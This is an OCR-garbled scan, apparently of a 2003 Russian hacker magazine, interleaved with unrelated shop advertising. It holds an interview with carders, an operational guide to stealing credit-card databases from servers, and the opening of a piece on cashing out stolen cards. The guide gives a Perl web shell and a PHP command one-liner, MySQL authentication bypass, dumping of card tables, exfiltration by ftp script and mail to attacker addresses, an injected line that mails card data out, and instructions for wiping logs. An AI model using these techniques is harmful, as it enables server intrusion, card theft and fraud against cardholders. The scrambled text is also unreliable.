нешних" кардеров - очень тупые лю- 
ди, не умеющие делать НИЧЕГО, кро- 
ме того, чтобы где-то что-то красть. 


XS: Какие сейчас самые популяр- 
ные способы кардерства? Какие 
считаются самыми профессиональ- 
ными (требующими высокой ква- 
лификации)? 

dos: Самого популярного способа не 
существует, каждый зарабатывает 
как может. Самыми профессиональ- 
ными, наверное, являются взломы 
банковских каналов передачи данных 
и различных алгоритмов шифрова- 
ния электронных подписей. 

ВГ: Самые популярные, наверное, аук- 
ционы. Потому что они требуют мини- 
мума знаний. Точнее, вообще их не 
требуют. Самый просфессиональный, 
скорее всего, пластик. В нем хотя бы 
надо понимать устройство и алгоритм 
работы. 


Х5: Каково, по-твоему, соотношение 
серьезных кардеров (людей, кото- 
рые углубленно изучают новые сис- 
темы денежных платежей и внедря- 
ют свои способы обхода защиты) к 
парням, ищущим легкого хлеба при 
минимуме затрат времени? 

cos: Вокруг кардинга крутится огром- 
ное количество народа, но реально что- 
то делает только один процент из них. 
Легкого хлеба в кардинге нет в прин- 
ципе. Может быть, в 1997 можно было 
что-то поиметь, не утруждая себя изу- 
чением темы, но не сейчас. 

ВГ: Матерых сейчас очень мало. 70%, 
если не больше - шушера, которая ту- 


по делает copy/paste информации из 
какого-нибудь текстовика paypal.txt в 
веб-браузер. Да, они, возможно, знают 
все настройки и возможности аккаун- 
ТОВ B этой платежной системе, но лич- 
но я не считаю это серьезными позна- 
ниями из области кардинга, так как все 
это знают большинство юзеров, поль- 
зующихся системой легально. 


XS: Как ты думаешь, имеет ли кар- 
динг "наркотический эффект"? 
Возникает ли привыкание к легким 
деньгам, и насколько оно серьезно? 
cos: Что-то такое есть. Как-то я с тем- 
пературой 40 не мог отойти от компа, 
потому что очень хорошо кардилось :). 
ВГ: Имеет эффект осознания того, в 
какой жопе мы живем в нашей стране 
и насколько абсуродна и ничтожна тут 
жизнь. Хотя у каждого по-разному. 
Тут, опять же, все зависит от самого 
человека. Для кого-то это не более 
чем игра, цель которой - сделать га- 


дость другому. 


XS: Какие основные правила дол- 
жен знать каждый кардер (если не 
хочет, чтобы его прижучили)? 

cos: Надо соблюдать анонимность. 
Работать с людьми, которым доверя- 
ешь. И не болтать много о том, какой 
ты крутой Kapgep. 

BI: Те же, что и у хакера: не светить 
свой IP, не светить свои данные. Про- 
ще говоря, делать так, чтобы улик 
твоей причастности к какому-либо де- 
лу было как можно меньше. Или вооб- 
ще не было :). 


XS: Существуют ли в России про- 
фессиональные команды, которые 
имеют ежемесячный оборот 
средств от кардинга в сотни тысяч 
или даже миллионы долларов? 
dos: Существуют. Называть их, есте- 
ственно, не буду. Такие команды при- 
нято называть семьями. Но чисто рос- 
сийскими их нельзя назвать, так как 
они рассредоточены по всему миру. 
ВГ: Смотрите новости по ти-ви, там 
про них в последнее время что-то час- 
то стали рассказывать :). 


XS: Возможно ли сейчас обуть с 
помощью кардерства за раз на ги- 
гантскую сумму? Скажем, на де- 
сять миллионов баксов? Как это 
возможно в общих чертах? 

cos: Можно, но очень-очень трудно. 
Можно, например, проникнуть в бан- 
ковскую сеть так, чтобы никто не за- 
метил, и с нескольких счетов перевес- 
ти бабки на свой. Потом надо снять 
бабки со счета, пока банк ничего не 
просек, и убираться на какой-нибудь 
остров в Тихом океане. 

BI’: Несмотря на то, что определение 
кардерства по-прежнему "махинации 
с кредитными картами", на самом деле 
сейчас это уже более обширная тема. 
В нее влились такие направления, как 
махинации со счетами в разных пла- 
тежных системах (PAYPAL, например). 


В силу развития интернет-технологий 
и электронных платежей, "обуть" 
можно и на 100 миллионов, но тогда 
это уже будет не кардерство, а хакер- 
ство. Или как это осрициально назы- 
вается в США - identity theft. Ты 6e- 
решь чужой логин и пароль от досту- 
па через интернет к его банковскому 
счету, и, если там лежат 100 миллио- 
нов, переводишь их на свой счет. Что 
касается кредиток... как я уже сказал 
ранее, смотрите телевизор. Там рас- 
сказывается и о методах, и о суммах, 
которые имеются с этих методов :). 


XS: Расскажи, какие сейчас самые 
навороченные способы защиты, 
применяемые в кредитных картах? 
И в общих чертах способы их об- 
хода, применяемые кардерами. 

dos: Да, как таковых, новых способов 
нет. Вот виза, например, недавно взя- 
ла и резко сократила процент непро- 
веренных транзакций, из-за этого 
многие биллинги закрылись, и карде- 
ры потеряли еще одну возможность 
зарабатывать. 

ВГ: Принцип работы всех кредитных 
карт одинаков. И применительно к се- 
ти нельзя говорить о способах защи- 
ты самих карт. Тут они не играют уже 
никакой роли. 

Другое дело - способы защиты пере- 
дачи и хранения информации с этих 
карт в интернете. А эти способы, как 
показывает практика, полная херня... 
Так как сейчас 80% (или даже 90%) 
всех кардерских дел осуществляется 
через интернет, то все вертится вок- 
руг кражи информации из интернета. 
И тут все как обычно... 


XS: Отличается ли чем-то кардинг в 
России от кардинга в других стра- 
нах? Например, в Америке? Может, 
есть какая-то своя специфика. 

dos: Каждый американец с рождения 
трясется за свою кредитную историю, 
в которую заносятся все крупные по- 
купки и т.п. Если человек будет заме- 
шан в чем-то плохом, это сразу же от- 
разится на его кредитной истории. И 
потом ему не дадут кредит, не примут 
на работу. Поэтому большинство аме- 
риканских кардеров являются эмиг- 
рантами из СНГ :). 

ВГ: Ага, отличается. Там преобладают 
негры :). 


XS: Существует ли кардерская "сце- 
на" как таковая? Есть ли в Carders 
community свои звезды, легендар- 
ные личности? Насколько развито и 
велико сообщество кардеров? 

005: Конечно, есть. Называть имена 
не буду. Трудно оценить все сообще- 
ство кардеров. В России, думаю, нес- 
колько тысяч человек. 

ВГ: Про это в вашем журнале уже 
рассказывал один мальчик год или 
два назад :). 


XS: Какие сайты/1ВС-каналы явля- 
ются центровыми для кардеров? 


Где собираются действительно 
знающие люди? Какие самые, на 
твой взгляд, достойные сетевые 
ресурсы по теме кардерства? 

cos: www.carderplanet.com. 

ВГ: Достойные люди He собираются 
на сайтах или тематических кардерс- 
ких каналах :). Кардерпленет.ком - про 
него уже писали. Те, кто интересуется 
кардингом, могут обращаться туда. 


XS: Какие страны в мире (и в СНГ) 
являются лидерами по кардерской 
активности? Существует ли какая- 
то зависимость, например, от об- 
щего уровня жизни? 

cos: В мире: Россия, Америка. В СНГ: 
Россия, Украина. Зависимости не су- 
ществует из-за того, что все деньги, 
которые получают кардеры, распреде- 
ляются в пределах небольшой группы. 
ВГ: В мире - Индонезия :), а также 
страны бывшего соцлагеря. В СНГ - 
Украина, Россия, Прибалтика. 


XS: Каким ты видишь кардерство 
через десять лет? Куда все, по- 
твоему, идет? 

cos: Через десять лет, имхо, исчезнут, 
наконец, кредитные карты. Но, несом- 
ненно, будут люди, которые будут за- 
ниматься электронными махинациями 
с денежными потоками. В том виде, в 
котором кардинг существует сейчас, 
все движется к закату кардинга. 

ВГ: С развитием беспроводных тех- 
нологий и базирующихся на этом 
технологий оплаты товара, а также 
технологий "физической" оплаты 
картами через интернет (когда, что- 
бы сделать оплату на сайте, ты дол- 
жен вставить свою или чужую :) 
карту в кардридер, подключенный к 
компьютеру, и ввести несколько 
пин-кодов), кардинг превратится в 
нечто среднее между фрикингом и 
хакерством. Придется красть ин- 
формацию, а потом применять ее 
путем эмуляции через какое-то уст- 
ройство. 


XS: Что бы ты посоветовал парням, 
которые не знают, что такое кардинг 
и как это вообще, но хотят легких 
денег, хотят стать кардерами? 

cos: Главное - не надеяться, что 
деньги сразу потекут рекой. Кардинг - 
очень трудное занятие. Для начала 
надо просто начать тусоваться на 
кардерских срорумах, вникать в тему, 
задавать вопросы. Через некоторое 
время, возможно, подвернется какая- 
нибудь работа. Или ты сам поймешь, 
что твоих знаний уже достаточно для 
занятия кардингом. 

Важно понять, что никакой добрый 
дядя не станет объяснять, что и как 
делается - до всего придется в основ- 
ном доходить самостоятельно. 

BI: Легкие деньги бывают редко. Поэ- 
тому, если хочешь хорошей и челове- 
ческой жизни, учись, получай качест- 
венные профессиональные знания и 
уезжай отсюда Ha@*#! 


Ничего не 
изменилось. 
Кардерство 
всегда было 
занятием 
для деби- 
лов. Это не 
хакерство, 
где нужны 
знания в 
области 
операцион- 
ных систем 
и програм- 
мирования. 
Большин- 
ство "ны- 
нешних"" 
кардеров - 
очень ту- 
пые люди, 
не умеющие 
делать НИ- 
ЧЕГО, кро- 
ме того, 
чтобы где- 
то что-то 
красть. 


Матерых 
сейчас 
очень мало. 
70%, если 
не больше - 
шушера, 
которая ту- 
по делает 
copy/paste 
информации 
из какого- 
нибудь 
текстовика 
paypal.txt в 
веб-брау- 
зер. 


a НАЙДИ И ПОИМЕЙ! \ 


Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


НАЙДИ И ПОИМЕЙ: 


ПОИСК КРЕДИТОК НА БУРЖУЙСКИХ МАШИНАХ 
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редитка - вещь необходимая. Особенно когда срочно нужно купить какую-либо электронную продукцию (шелл, 

домен и прочее). Что же делает хакер в случае такой необходимости? В большинстве случаев лезет на бур- 
жуйские трейдерские каналы и просит у добрых дяденек Kpegy для теста (обычно его или посылают, или дают прос- 
роченную карту из базы 1990г.). Все, наверное, знают пословицу: "Чем просить и унижаться, лучше <censored> и 
молчать". Так BOT, я думаю, если утащить пару-тройку кредитных баз у этих самых буржуев, они не сильно обидят- 
ся, потому как сами при удобном случае крадут карты у невинных людей. 


У НАС СВОИ 


МЕТОДЫ... 


и Прежде чем присту- 


Самое лег- 


кое - это 
зарегиться 
на фривар- 
ном хостин- 
ге с FTP- 
доступом с 
поддержкой 
CGI либо 
РНР (зачем 
это нужно, 
я расскажу 
ниже). 
Плюсы дан- 
ного метода 
очевидны: 
легкий по- 
иск жертвы, 
никакого 
риска при 
этом, а так- 
же полная 
уверен- 
ность, что 
креды нахо- 
дятся имен- 
но на этом 
сервере 
(либо в сег- 
менте). 


пить к поиску баз с кре- 


дитками, необходимо 


получить какой-пибо доступ к серверу, 
где, собственно, эти базы находятся. 
Это можно сделать несколькими мето- 
дами. С этого и начнется взлом, поэто- 
му для хакера очень важно понимать 
поставленную задачу и уметь прони- 
кать на удаленный сервер. 


Самое легкое - это зарегиться Ha фри- 
варном хостинге с ЕТР-доступом с 
поддержкой СС! либо РНР (зачем это 
нужно, я расскажу ниже). Плюсы дан- 
ного метода очевидны: легкий поиск 
жертвы, никакого риска при этом, а 
также полная уверенность, что креды 
находятся именно на этом сервере 
(либо в сегменте). Минусы также име- 
ются: за регистрацию придется выло- 
жить несколько зеленых президен- 
тов, либо расплатиться кредиткой 
(око за OKO, креда за креды ;)). 


Если все сделано правильно и хос- 
тинг куплен, пришло время заняться 
нехорошим делом... то бишь проник- 
новением в чужую собственность. У 
хакера имеются два варианта: либо 
сервер поддерживает с9!-скрипты, ли- 
бо php. В первом случае пишется ма- 
ленький рег|--сценарий, который gon- 
жен быть помещен на сервер в А$С!- 
режиме. 


#!/usr/bin/per| 
Scmd=SENV{QUERY_STRING}; ## Ko- 
манда будет задаваться через 
QUERY_STRING 

Scmd=~s/%20/ /g; #H Замена уникод- 
символа %20 Ha пробел 
$ета=`$ста`; + Выполнение коман- 
db 
print "Content-type: text/html\n\n"; + 
Вывод заголовка 

print '"<pre>Scmd</pre>"; ## И резуль- 
тата команды 


Этот скрипт должен иметь права 755, 
только в этом случае он сможет вы- 
ПОЛНИТЬСЯ. 


ХАКЕРСПЕЦ | 11(36) | 2003 


В случае с PHP все намного проще. 
Скрипт вообще можно записать в OG- 
ну строку: 
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<?passthru(Scmd);?> 


Разница с Perl лишь в способе 3aga- 
ния команды. Теперь QUERY_STRING 
должна иметь вид: ?ст=команда. 
Зачем все это нужно? Во всех случа- 
ях хакер владеет простым nobody- 
шеллом. То есть существует возмож- 
ность выполнения команда через бра- 


ыы а вы в — вы = 
o— ; ce пе — = 1 ы 
Не = Е 


ея. 


узер. Это, конечно, хорошо, но раци- 
ональнее бы было открыть порт, при 
коннекте на который запускается 
shell-uHtepnpetatop. Таких бэкдоров 
в инете полно, принципы их работы 
не раз описывались на страницах 
СПЕЦа и Хакера. 


Я назвал далеко не все методы на- 
хождения жертвы. Обнаружить сер- 
Bak, за которым хранятся огромные 
базы с кредитками, можно... через 
IRC. Суть заключается в следующем: 
взломщик заходит на канал бур- 
жуйских трейдеров, делает /WHOIS 
каждого сидящего и сканит его сер- 
вер на уязвимости. Если учитывать, 
что на таких каналах сидят 200-300 
человек, то вероятность взломать 


какого-нибудь зазевавшегося бур- 
жуя довольно высока. 


Но хуизать две сотни человек, мягко 
говоря, не кошерно... Поэтому специ- 
ально для этого я написал удобный 
Рег-скрипт. Он коннектится на задан- 
ный сервер, заходит на канал и вы- 
полняет команду /WHO #channel. При 
этом выводится вся информация о 
пользователях, включая IP-agpec. Вот 
его-то скрипт и заносит в предопреде- 
ленный лог-файл, причем делает это 
очень быстро (вся работа скрипта за- 
нимает несколько секунд). Не буду 
вдаваться в рутинный код трехкило- 
байтного сценария, при желании ты 
посмотришь его сам. Скачать мое тво- 
рение можно по адресу 
http://kamensk.net.ru/forb/1/x/whois.tar.gz. 
Следует сказать пару слов о файле с 
|Р-адресами, который генерирует мой 
whoiser. Формат его следующий: ip # 


fei £ F 


nick (#channel). Не смотря Ha коммен- 
тарий, NMap наотрез отказывается об- 
рабатывать такой файл, поэтому в ар- 
хиве ты также найдешь скрипт 
nmap.pl, который немного изменяет 
лог хуизера и делает запрос сканеру. 
В итоге запрос получается следую- 
щим: 


system("nmap -iL Sfile -o Soutfile -- 
host_timeout Stimeout -p Sports -O"); 


Все переменные, за исключением 
Не, задаются в начале скрипта. 
Файл с "чистыми" адресами генериру- 
ется whois.pl, отделяя от первичного 
все комментарии. 


Все MeTOgbI, какими бы сложными они 
ни являлись, должны приводить к 
шеллу. Права тут не имеют значения 
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Согласованные действия сканера 


(но, опять же, чем больше, тем лучше 
;)), потому как на каждую гайку найдет- 
ся ключ 10x12. Иными словами, найти 
креды в Linux сложно, но можно (если 
быть уверенным, что они там есть). 


поиск, только ПОИСК! 

m Представь на секунду: попал хакер 
в неизвестную систему под правами 
породу. В ней, кроме него, сидят два 
не спящих рута, и нарушитель может 
быть замечен в любую минуту. Очень 
сложно производить какой-либо 
взлом в таких условиях, поэтому необ- 
ходимо взять себя в руки и никогда не 
терять координацию в системе. 


Первая команда, которую выполнит 
взломщик - это Unset HISTFILE. Нес- 
мотря на его права, bash всегда запи- 
шет историю команд, которая может 
быть прочитана бдительным админом 
сервака. Это важно помнить, чтобы не 
давать буржую ни единого шанса 
поймать нарушителя. 


Креды могут находиться в нескольких 
местах. Если это web-pecypc, то, скорее 
всего, данные будут лежать в WWW-Ggl- 
ректории. Если это домашняя тачка 
буржуя, креды, вероятно, находятся в 
mySQL (или другой) базе (к которой, 
естественно, нужно иметь доступ). 


Начнем с легкого пути. Хакеру нужно 
знать мммм/-директорию. Для этого он 
выполняет команду locate httpd.conf. 
В ответ команда выплюнет местона- 
хождение конорига веб-сервера. В нем 
и задается путь к www. Команда cat 
httpd.conf | grep DocumentRoot даст 
взломщику информацию о каталоге. 


Следующим шагом будет анализ 
cgi/php скриптов, которые принимают 
запросы от клиентов. Необходимо уз- 
нать, куда скидываются кредитки - в 


БИНАРНЫЙ ПОИСК 
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: Так обнаруживается каталог WWW 
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файл или в базу. Если это файл - 
нужно просто заархивировать его и 
сохранить в темном и прохладном 
месте =). В противном случае ситуа- 
ция немного усложняется. 


НУ И ЗАПРОСЫ У ВАС! 

m Вообще, все действия напрямую 
зависят от ситуации: консригурации 
сервака, прав на нем ит.д. и т.п., поэ- 
тому четко указать алгоритм поиска 
кред практически невозможно. Но я 
попытаюсь дать несколько советов, 
которые значительно ускорят 
действия хакера и, в конце концов, 
приведут к успешному результату. 


Для того чтобы прицепиться к MySQL 
(в наше время именно такие СУБД ру- 
лят на серваках), хакер достает логин 
и пароль пользователя, прописанные 
в таблице авторизации этой базы. 
Несмотря на кажущуюся сложность, 
данные можно добыть довольно 
быстро и просто. Они находятся в пре- 
дустановках cgi/php скриптов, обслу- 
живающих СУБД. Права nobody 
должны позволять читать эти скрип- 
ты, поэтому особых сложностей с по- 
Лучением аккаунта у взломщика не 
возникнет. Стоит только отметить, что 
в СС-сценариях логин и пароль чаще 
всего указываются в начале сфайла, в 
переменных. В случае с РНР, данные 
хранятся в include-ckpuntax, которые 
затем подключаются в сценариях 
функцией include(). Такие файлы, как 
правило, имеют расширение „пс и на- 
ходятся в папке include/. Найти их не 
составляет особого труда. 


Если хакеру посчастливилось nony- 
чить root-npaBa, то не нужно вообще 
ничего искать. Достаточно убить про- 
цесс mysqld, затем запустить базу за- 
HOBO с параметром --skip-grant-tables. 
При этом демон не будет считывать 
таблицы авторизации. Теперь можно 
смело логиниться под рутом без паро- 
ля - взломщика пустят в базу данных. 
Он ни за что не забудет вернуть де- 
мон на место с обычными параметра- 


Ш Вряде случаев не получается перезапустить mysqid, а также 3a- 
логиниться в СУБД. Тогда можно попробовать поискать кредитки в 


бинарных таблицах. Они находятся в /var/lib/mysql/data. Просмот- 
реть их содержимое можно командой grep. К примеру, запрос grep 
-ir visa * > cc.log запишет лог совпадений с шаблоном. 


ми после дампа таблицы, иначе его 
пребывание заметят админы. 


Теперь о сложностях - необходимо 
составить правильный запрос, чтобы 
получить верный ответ. Помни, что 
конечной целью хакера является об- 
наружение большой базы с рабочими 
кредитками =). 


Входить в базу следует, учитывая ин- 
терактивность. Если шелл, который 
поимел нарушитель, открыт бэкдором 
(интерактивно) без поддержки псев- 
дотерминала, то выполнять запросы 
sql следует через опцию -е клиента 
mysql. Об однострочных командах я 
расскажу чуть позже, просто имей это 
в виду. 


Итак, вход в СУБД происходит с по- 
мощью клиента. Для этого ему зада- 
ются следующие параметры: логин, 
пароль, хост и база (необязательно). 
В нашем случае вполне подойдет сле- 
дующая команда: 


Взломщик 
ss 2 заходит на 
mysql -u carder -pcarderbaze. т 
жуйских 
Естественно, что Cader:carderbase ак- рые 
каунт, предварительно найденный в /WHOIS 
web-ckpuntax. каждого си- 
дящего и 
сканит его 
Если все верно, нарушитель получит сервер на 
стандартное приглашение клиента ны 
(mysql>). Далее необходимо сделать тывать, что 
переход в нужную базу. Узнать ее назхаких 
a . каналах си- 
можно командой show databases; Пе- дят 200- 
реход в БД выполняется двумя путя- 300 чело- 

. Ш п век, то ве- 
ми: либо сочетанием \и name_db", роятность 
либо командой use name_db (где взломать 

какого-ни- 
name_db имя базы). . Gygb аа. 
Хакер внутри нужной базы. Теперь он вавшегося 
удостоверится, что это действительно буржуя go- 

вольно вы- 


то, что ему нужно. Взломщик напишет 
"show tables;" и найдет таблицу типа 
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Логин в СУБД 


cards или payment (вообще-то, она 
указывается в пс сайлах). Затем он 
делает тестовый запрос: 


select * from table_name limit 1; 


Параметр limit означает, сколько 

строк из таблицы будет выводиться 

на экран. Учитывая, что хакеру сов- 

сем не нужно листать миллион запи- 
сей, он указывает всего одну строку. » 


Если хакеру 
посчастли- 


вилось по- 
лучить 
root-npaBa, 
то не нужно 
вообще ни- 
чего искать. 
Достаточно 
убить про- 
цесс 
ту$914, за- 
тем запус- 
тить базу 
заново с па- 
раметром -- 
skip-grant- 
tables. 


Наряду с 
mySQL су- 
ществуют 
другие 
СУБД, та- 
кие, как 
PostgreSQL, 
Oracle и gp. 
Вряд ли ты 
с ними 
столкнешь- 
ся, но не 
вредно 
знать, что в 
PostgreSQL 
базы узна- 
ются ко- 
мандой 
"select * 
from post- 
gres_db", а 
таблицы 
"select * 
from post- 
gres_tables" 
. Остальные 
запросы 
полностью 
совпадают с 
синтаксисом 
myS@L. 


НАЙДИ И ПОИМЕЙ! \ 


НЕСТАНДАРТНЫЕ СИТУАЦИИ 

и Поговорим о нестандартных ситуа- 
циях, которые могут возникнуть. Я 
уже упоминал об интерактивном шел- 
ле. Дело в том, что без псевдотерми- 
нала невозможно корректно наблю- 
дать за приглашениями клиента, соот- 
ветственно, если зайти в базу как 
обычно, хакер будет тыкаться в кон- 
соли как слепой котенок. Для этого 
случая был придуман параметр -е, 
позволяющий выполнять команды 
SQL в одной строке. Итак, запрос: 


mysql -u carder -pcarderbaze -e 'select 
* from table_name limit 1! name_db 


дает такой же результат, что и в пре- 
дыдущем случае. 

Наряду с mySQL существуют другие 
СУБД, такие, как PostgreSQL, Oracle и 
др. Вряд пи ты с ними столкнешься, 
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но не вредно знать, что в PostgreSQL 
базы узнаются командой "select * 
from postgres_db", а таблицы "select * 
from postgres_tables". Остальные 3an- 
росы полностью совпадают с синтак- 
сисом mySQL. 


БЭКАПИМ И ЗАБИРАЕМ 

m После того как взломщик убедил- 
ся, что информация действительно 
находится на сервере и доступна для 
чтения, ее необходимо извлечь, заар- 
хивировать и отправить в безопасное 
место для дальнейшего изучения =). 


Казалось бы, все просто, и описывать 
процедуру архивирования бессмыс- 
ленно, но на самом деле тут тоже су- 
ществуют свои подводные камни, из- 
бежать которых помогут мои советы. 


Во-первых, следует извлечь данные 
из нужной SQL таблицы. Для этого 
вовсе не обязательно выполнять ко- 
MaHgy через параметр -е и перенап- 
равлять ее вывод в файл. Если 
действовать таким способом, есть ве- 
роятность потерять значительную 
часть большой базы. В пакете туза! 
существует утилита туза итр, npeg- 
назначенная как раз для решения 
поставленной задачи. Синтаксис ее 
практически не отличается от обыч- 
ного клиента, поэтому команда 


mysqldump -u carder -pcarderbaze 
name_db table_name > cc_baze 


РАЗЛИЧНЫЕ ЛОГИ 


Ш Пути к логам напрямую зависят от демона, через который инфа 
поступает в файлы. В случае с syslogd, журналы будут pacnona- 


гаться 


в папке /var/log (если админ 


не перенастроил 


/etc/syslog.conf). Если программа другая (например, ng-syslogd), 
пути будут иными. Узнать их можно по конфигу демона. 


запишет структуру таблицы 
{а е_пате в файл cc_baze. 


Разумеется, закидывать базу данных 
несколькими десятками (а то и сотня- 
ми) мегабайт нерационально без ар- 
хивации. Поэтому сожмем файл 
bzip'om (он лучше gzip в плане комп- 
рессии). Для этого пишем: 


tar jcf cc_baze.tar.bz2 cc_baze 


А теперь самое сложное. Необходи- 
мо в срочном порядке выкачать ар- 
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Сохранение данных таблиц 


хив с территории взломанного серве- 
ра. Если у хакера имеется root-goc- 
туп, то задача проста - ему надо ско- 
пировать архив в любую папку web- 
сервера. Но это не всегда так. Под 
nobody (да и другими) правами по- 
добное редко когда можно осущест- 
вить, разве что в случае, если на ка- 
талоге стоят права на запись. В боль- 
шинстве ситуаций приходится ис- 
пользовать утилиту ftp. Вот тут-то и 
всплывают всякие мелочи. 


Помнишь, я говорил про интерактив- 
ный шелл? Без псеваотерминала об- 
мен данными между юзером и коман- 
дой Нр будет очень глючным. Точнее, 
все запросы, которые будет выда- 
вать бинарник, взломщик увидит 
лишь после команды quit. Но это не 
означает, что залить файл через ftp 
невозможно. Если воспользоваться 
сценарием, совсем не нужно контро- 
лировать ход соединения. 


Для справки: сценарий - небольшой 
файл, в котором содержится список 
комана gna /usr/bin/ftp. Затем этот 
файл подставляется в строку запус- 
ка, и хакеру остается лишь дождать- 
ся завершения работы клиента. 
Единственное неудобство - это соз- 
дание сценария. Команды придется 
дозаписывать в дайл при помощи 
команды echo. 


Эта последовательность команд сос- 
тавит и выполнит Ёр-сценарий 

echo user hacker 31337 > ftp 

echo pass 

echo type binary 

echo put ./cc_baze.tar.bz2 

echo quit 

ftp -n hack.host.ru < ./ftp 


Опция -n ftp-cepBepa позволяет npo- 
изводить аутентификацию в одну 
строку (без поддержки интерактив- 
ности). Именно поэтому я указал имя 
пользователя и его пароль в одной 
строке. Заставить клиента перечитать 
текстовик как сценарий позволяет 
стандартное перенаправление деск- 
риптора ввода (stdin). При этом лишь 
остается дождаться, пока cpann 
транспортируется с сервера на уда- 
ленный Нр'шник. 


- = = 
Короткий сценарий gna ftp и ero 
реализация 


При отсутствии Ир-сервера, можно 
воспользоваться командой mail, что- 
бы послать базу на мыло. Но перед 
этим необходимо превратить аттач в 
циепсоде-шифр командой uuencode: 


uuencode ./cc_baze.tar.bz2 
cc_baze.tar.bz2 | mail hacker@host.ru 


Параметры uuencode назначают име- 
на локального (bana и название ар- 
хива после кодирования. Но стоит 
быть уверенным, что smtpd Ha уда- 
ленном серваке настроен и работает 
как надо, иначе послать е-тай не по- 
лучится. 


КОНЧИЛ - ПРОТРИ СТАНОК! 

m Немаловажным шагом после 63- 
капа базы является тщательная 
протирка логов. Естественно, делать 
это нужно только Nog гоо{-правами, 
под непривилегированным аккаун- 
том следует принять все меры, что- 
бы оставлять как можно меньше 
следов. 


Во-первых, это /var/log/messages - 
лог, о котором почему-то все забыва- 


Е 


GAMEPOST 
ют. Туда сваливаются мессаги различного характера. После 


взлома сервера его обязательно Нужно почистить. 


Во-вторых, файлы в домашней директории пользовате- 
ля. Это .bash_history и .mysql_history. За историю команда 
интерпретатора можно не беспокоиться, если предвари- 
тельно была выполнена команда unset HISTFILE. Чтобы 
очистить список комана MySQL, необходимо удалить 
файл, либо выполнить false > /path/to/.mysql_history, что- 
бы обнулить его содержимое. 


В-третьих, директория /var/log/mysql хранит все логи об- 
ращений к СУБД. Их также необходимо удалить. 


И, наконец, нужно уделить внимание таким мелочам, как 
лог от httpd, временные сценарии и базы с кредами, ко- 
торые, возможно, были оставлены в каталогах /home, 
/tmp и т.п. 


Собственная безопасность при этом превыше всего, так 
как у кардеров очень хорошие связи. Если они заподоз- 
DAT тебя в краже своих баз и обнаружат твой IP в логах - 
поверь, придется очень несладко. 


ПОДПИШИСЬ НА РАССЫЛКУ 
и Ты, наверное, знаешь, что база у крупных кардеров ее 

постоянно пополняется. Каждый раз лезть на сервак и Sinan 59 ТЕР отражающей marpuilen 

архивировать новые карточки не совсем удобно, поэтому (40.8 ммх 61.2 мм) 

МОЖНО добавить несколько посторонних строк в perl/php Разрешение и цвет: 240x160 пикселей, 

код, обрабатывающий запрос с Web. Но следует быть 32.768 возможных цветов 

очень осторожным, ведь кардер сам мог составить этот о. 


Вес: 140 г 
скрипт и знать код в нем как свои пять пальцев. Питание: 2 батареи класса АА (15 часов) 


| Носители данных: картриджи 
Допустим, у нас имеется скрипт form.cgi, в котором нахо- Другое: Стереозвук, совместим с играми для 
дится обращение к базе и запись туда содержимого мас- Game Boy и Game Boy Color вы 


сива @card. Шпионская строка вида Технические спецификации только для GBA SP: 


* Интегрированная подсветка LCD экрана* Входящая в комплект перезаряжаемая Lithium 
lon батарея, способная работать 10 часов безостановочной игры, заряжаемая всего 3 часа 


Процессор: 82-Bit ARM 


system("echo @card | mail hacker@host.ru"); 
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Аккуратная модификация кода 


Banjo Kazooie: 


Grunty's Re 
позволяет отправлять данные о карте на твое мыло. Пе- 
ред этим следует запомнить, какие именно данные зано- i: sales@e-shop.ru 
сятся в этот массив. с 10.00 до 21.00 пн - пт 


с 10.00 до 19.00 сб - в 
ДЕЙСТВУЙ ОСТОРОЖНО стоимость д авки cn 


m Ты уже не маленький, и понимаешь, что все эти ОКУПАТЕЛЕЙ 


снижена на 10% 
действия описаны лишь с ознакомительной целью. Ответ- 
ственность за их применение на практике несешь только у y \Л/. GA М Е Р |. с Г ‚р [ | 


ты и никто другой. 


Как правило, кардеры - народ ленивый. Возможно, он не 
будет гнаться за тобой, когда узнает, что ты позаимствовал 
у него пару тысяч свежих кредиток ;). Но раз на раз не при- 


ходится, поэтому всегда необходимо принимать меры пре || Я ХОЧУ ПОЛУЧАТЬ БЕС ПЛАТН ЫЙ 
досторожности, подробно описанные в этой статье. = КАТАЛОГ GAMEBOY СУ =ихЕы 
ИНДЕКС ГОРОД 
УЛИЦА OM юЮРПУС КВАРТИРА 
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ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 


Гарри aka ElectrOShOck (ccmaster@mail.ru, www.ccworld.ru) 
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О-ХИТРОМУ 


ОБНАЛИЧКА ПО-ХИТРОМУ ) 


8 СПОСОБОВ ПОЛУЧЕНИЯ ЧЕСТНО НАКАРДЕННОГО 


лово "обналичка" вызывает разные ассоциации. У кардера с этим связано очень 
многое, в частности - дропы, платежные системы и, разумеется, большие деньги :). 


q 
о в итоге все сводится практически как заблагорассудится. 
к одному - извлечению Пусть не все, но какую-то часть тебе 
из виртуальных карто- наверняка удастся извлечь. Как? Об 
чек вполне реальных этом я тебе сегодня расскажу. 
денег. Например, 
WebMoney. Конечно, готовых рецеп- СПОСОБ '1°1 - ПЕРЕВОД 
тов "сс > WM" я не дам. Таких просто и Давай посмотрим, как осущест- 
не существует. Многих новичков об- вить перевод денег "CC > E-Gold > 
манывают именно таким способом, по- WM" (кредитная карта - ЭПС "E-Gold" 
тому что любого человека, только - WebMoney). Дело в том, что E-Gold 
пришедшего в кардинг, будет терзать деньги ты сможешь купить прямо с 
мысль: "Как же мне поскорее обнали- кредитной карты, а их уже без проб- 
чить кредитную карту в WM и поиметь лем можно перевести на WM, обмен- 
много 5?" ников сейчас в Сети очень много (их 
список можно найти, например, на 
СПОСОБ '1° © = ПРОДАЖА www.golddirectory.com/e-gold.htm), главное 
и Самый элементарный способ - - выбрать подходящие тебе процен- 
Таким продажа кредитных карточек. Его ты. Конечно, здесь есть и сложнос- 
образом, за можно даже назвать примером "сс to ти - у тебя могут попросить подт- 
виртуально 


е общение с 
самим собой 
вполне 
реально 
заработать 
go 500 
долларов в 
месяц. 


На hostonce 
практичес- 
ки не про- 
веряют сс, 
и сайт ни- 
когда не 
закроют. 


WM с удо- 
вольствием 


это сделает, 
плюс обяза- 
тельно заб- 
локирует 
твой WM ID. 
To ecTb 
Becb Keeper. 


WM". Ты даешь кредитную карточку - 
тебе тут же перечисляют практичес- 
кие легальные деньги. 


Потенциальная валидная (т.е. с лежа- 
щей на ней энной суммой денег) кре- 
да стоит в среднем $2-3. Очень не- 
большие деньги, если учесть, что на 
кредитной карте может лежать GO 
нескольких тысяч долларов, которые 
ты впоследствии сможешь тратить 


верждение по телефону, скан 
